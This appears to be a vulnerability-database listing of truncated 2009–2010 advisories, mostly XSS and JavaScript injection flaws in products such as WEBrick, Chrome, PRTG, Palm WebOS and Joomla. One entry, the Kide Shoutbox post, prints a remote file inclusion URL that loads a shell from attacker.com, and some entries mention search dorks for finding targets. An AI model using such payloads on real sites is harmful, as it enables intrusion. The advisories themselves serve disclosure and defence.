CVE-2010-0541 Ruby WEBrick javascript injection flaw

Cross-site scripting XSS vulnerability in the WEBrick HTTP server in Ruby in Apple Mac OS X 10.5.8, and 10.6 before 10.6.4, allows remote attackers to inject arbitrary web script or HTML via a crafted URI that triggers a UTF-7 error page...

Paessler - PRTG Traffic Grapher XSS

aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 08-Jun-2010 Software: Paessler - PRTG Traffic Grapher http://www.paessler.com "PRTG Network Monitor runs 24/7 on a Windows-based machine within your network, recording network usage parameters...

Paessler PRTG Traffic Grapher 6.2.1.945 Cross Site Scripting

aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 08-Jun-2010 Software: Paessler - PRTG Traffic Grapher http://www.paessler.com "PRTG Network Monitor runs 24/7 on a Windows-based machine within your network, recording network usage parameters...

Google Chrome 4.1.249.1059 Cross Origin Bypass

Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL GURL CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663 Author: Jordi Chancel Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html Description: The Google URL Parsing...

leaftec CMS - Multiple Vulnerabilities

leaftec CMS - Multiple Vulnerabilities Exploit Title: leaftec cms multiple vulnerabilities Date: 21.03.2010 Author: Valentin Höbel Version: Tested on: Debian etch CVE : Code : :: General information :: leaftec cms multiple vulnerabilities discovered :: by Valentin Höbel :: [email protected] ...

Vbulletin Blog 4.0.2 XSS Vulnerability

Exploit for php platform in category web applications ====================================== Vbulletin Blog 4.0.2 XSS Vulnerability ====================================== Author: FormatXformat Version: Vbulletin 4.0.2 Dork: Powered by vBulletin Version 4.0.2 Copyright 2010 vBulletin Solutions, In...

Silverstripe CMS 2.3.4 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Silverstripe CMS, , version 2.3.4 and lower and its unreleased 2.4 branch, is vulnerable to two Cross Site Scripting issues. 1. The comment posting mechanism of Silverstripe 'PostCommentForm' fails to properly sanitize the 'CommenterURL' parameter...

FDF Files Containing Timed JavaScript (CVE-2009-3956)

FDF is a file format used for representing form data and annotations that are contained in a PDF form. A remote attacker may exploit this issue to inject JavaScript into a PDF file from any domain on the internet. When Acrobat loads an FDF file, there is no check to ensure that the target file,...

2009 You! Hostit! XSS

No description provided by source. andresg888 Contact : andresg8884tgmaildotcom Web: : www.ilegalintrusion.nethttp://www.ilegalintrusion.net & www.bl4ck-p0rtal.orghttp://www.bl4ck-p0rtal.org Dork : No DoRk f0R ScRipT KiDDieS Example:...

DPI 1.1-final Powered by Clixint XSS

No description provided by source. andresg888 Vendor : http://www.image-host-script.com/ Contact : andresg8884tgmaildotcom Web: : www.ilegalintrusion.nethttp://www.ilegalintrusion.net & www.bl4ck-p0rtal.orghttp://www.bl4ck-p0rtal.org Dork : No DoRk f0R ScRipT KiDDieS Example1:...

Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR

Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR andresg888 Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Exploit : Go to the shoutbox and type: red text or hi or 3xplo!t : http://server/path/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? Greetz : 84kur10 , Brunos50 Speci...

Fedora Core 10 FEDORA-2009-10377 (python-markdown2)

The remote host is missing an update to python-markdown2 announced via advisory FEDORA-2009-10377. OpenVAS Vulnerability Test $Id: fcore200910377.nasl 6624 2017-07-10 06:11:55Z cfischer $ Description: Auto-generated from advisory FEDORA-2009-10377 python-markdown2 Authors: Thomas Reinke Copyright...

Fedora Core 11 FEDORA-2009-10329 (python-markdown2)

The remote host is missing an update to python-markdown2 announced via advisory FEDORA-2009-10329. Note: This VT has been deprecated and is therefore no longer functional. SPDX-FileCopyrightText: 2009 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyrig...

Fedora 11 : python-markdown2-1.0.1.15-1.fc11 (2009-10329)

Update from 1.0.1.11 to 1.0.1.15, which fixes some issues, including these two security-related bugs: - Issue 30 Fix a possible XSS via JavaScript injection in a carefully crafted image reference usage of double-quotes in the URL. - Issue 29 Fix security hole in the md5-hashing scheme for handlin...

Palm Pre WebOS <=1.1 Remote File Access Vulnerability

I. Description The Palm Pre WebOS =1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Palm has patched this vulnerability and all users are recommended to upgrade to WebOS version 1.2+. Palm WebOS 1.2 patch information can be...

Palm Pre WebOS <=1.1 Remote File Access Vulnerability

No description provided by source. I. Description The Palm Pre WebOS =1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Palm has patched this vulnerability and all users are recommended to upgrade to WebOS version 1.2+. Palm...

Palm Pre WebOS 1.1 - Remote File Access

I. Description The Palm Pre WebOS =1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Palm has patched this vulnerability and all users are recommended to upgrade to WebOS version 1.2+. Palm WebOS 1.2 patch information can be...

Palm Pre WebOS 1.1 - Remote File Access

Palm Pre WebOS 1.1 - Remote File Access I. Description The Palm Pre WebOS =1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Palm has patched this vulnerability and all users are recommended to upgrade to WebOS version 1.2+...

Google Chrome < 3.0.195.21 Multiple Vulnerabilities

The version of Google Chrome installed on the remote host is earlier than 3.0.195.21. Such versions are reportedly affected by multiple issues : - Google Chrome's inbuilt RSS/ATOM reader renders untrusted JavaScript in an RSS/ATOM feed. Provided a victim connects to a RSS/ATOM feed link controlle...

Update Protection against Joomla! HTTP Header Script Injection

Joomla! is a content management system CMS designed for building Web sites and online applications. Joomla! fails to parse HTTP headers, allowing an attacker to inject JavaScript or DHTML code that can be executed in the context of a target user browser...